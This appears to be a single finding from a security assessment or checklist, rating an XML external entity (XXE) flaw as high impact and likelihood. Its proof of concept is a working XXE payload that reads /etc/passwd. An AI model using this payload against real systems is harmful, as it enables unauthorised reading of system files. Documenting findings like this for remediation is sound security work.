V5 - Validation/Sanitization
XXE
POC
Provide the following input as the XML content <?xml version="1.0"?> <!DOCTYPE cdl [<!ENTITY asd SYSTEM "file:///etc/passwd">]> &asd;
For more info, please refer to: https://blog.cobalt.io/how-to-execute-an-xml-external-entity-injection-xxe-5d5c262d5b16
Impact
High
Likelihood
High